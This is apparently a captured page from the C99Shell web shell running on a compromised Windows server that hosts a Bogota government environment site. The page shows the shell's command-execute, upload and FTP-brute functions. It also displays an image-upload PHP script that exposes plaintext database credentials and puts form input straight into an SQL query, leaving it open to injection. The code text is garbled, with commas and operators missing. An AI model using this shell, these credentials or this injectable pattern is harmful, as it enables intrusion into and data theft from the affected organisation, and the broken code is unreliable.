!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\AmbienteBogota\ambientebogota.gov.co\Tomemos_Conciencia\fotos\   drwxrwxrwx
Free 4.13 GB of 39.52 GB (10.45%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     guardar_imagen.php (2.9 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
// Verificamos que el formulario no ha sido enviado aun
$postback = (isset($_POST["enviar"])) ? true false;
if($postback){
  // Nivel de errores
  error_reporting(E_ALL);
  // Constantes
  # Altura de el thumbnail en píxeles
  define("ALTURA"100);
  # Nombre del archivo temporal del thumbnail
  //define("NAMETHUMB", "/tmp/thumbtemp"); //Esto en servidores Linux, en Windows podría ser:
  define("NAMETHUMB""c:/windows/temp/thumbtemp"); //y te olvidas de los problemas de permisos
  # Servidor de base de datos
  define("DBHOST""localhost");
  # nombre de la base de datos
  define("DBNAME""uno");
  # Usuario de base de datos
  define("DBUSER""dba_ambiente");
  # Password de base de datos
  define("DBPASSWORD""fabianS3cr3tar1a");
  // Mime types permitidos
  $mimetypes = array("image/jpeg""image/pjpeg""image/gif""image/png");
  // Variables de la foto
  $name $_FILES["foto"]["name"];
  $type $_FILES["foto"]["type"];
  $tmp_name $_FILES["foto"]["tmp_name"];
  $size $_FILES["foto"]["size"];
  // Verificamos si el archivo es una imagen válida
  if(!in_array($type$mimetypes))
    die("El archivo que subiste no es una imagen válida");
  // Creando el thumbnail
  switch($type) {
    case $mimetypes[0]:
    case $mimetypes[1]:
      $img imagecreatefromjpeg($tmp_name);
      break;
    case $mimetypes[2]:
      $img imagecreatefromgif($tmp_name);
      break;
    case $mimetypes[3]:
      $img imagecreatefrompng($tmp_name);
      break;
  }
  $datos getimagesize($tmp_name);
  $ratio = ($datos[1]/ALTURA);
  $ancho round($datos[0]/$ratio);
  $thumb imagecreatetruecolor($anchoALTURA);
  imagecopyresized($thumb$img0000$anchoALTURA$datos[0], $datos[1]);
  switch($type) {
    case $mimetypes[0]:
    case $mimetypes[1]:
      imagejpeg($thumbNAMETHUMB);
          break;
    case $mimetypes[2]:
      imagegif($thumbNAMETHUMB);
      break;
    case $mimetypes[3]:
      imagepng($thumbNAMETHUMB);
      break;
  }
  // Extrae los contenidos de las fotos
  # contenido de la foto original
  $fp fopen($tmp_name"rb");
  $tfoto fread($fpfilesize($tmp_name));
  $tfoto addslashes($tfoto);
  fclose($fp);
  # contenido del thumbnail
  $fp fopen(NAMETHUMB"rb");
  $tthumb fread($fpfilesize(NAMETHUMB));
  $tthumb addslashes($tthumb);
  fclose($fp);
  // Borra archivos temporales si es que existen
  @unlink($tmp_name);
  @unlink(NAMETHUMB);
  // Guardamos todo en la base de datos
  #nombre de la foto
  $nombre $_POST["nombre"];
  $link mysql_connect(DBHOSTDBUSERDBPASSWORD) or die(mysql_error($link));;
  mysql_select_db(DBNAME$link) or die(mysql_error($link));
  $sql "INSERT INTO tabla(nombre, foto, thumb, mime)
    VALUES
    ('$nombre', '$tfoto', '$tthumb', '$type')";
  mysql_query($sql$link) or die(mysql_error($link));
  echo "Fotos guardadas";
  exit();
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--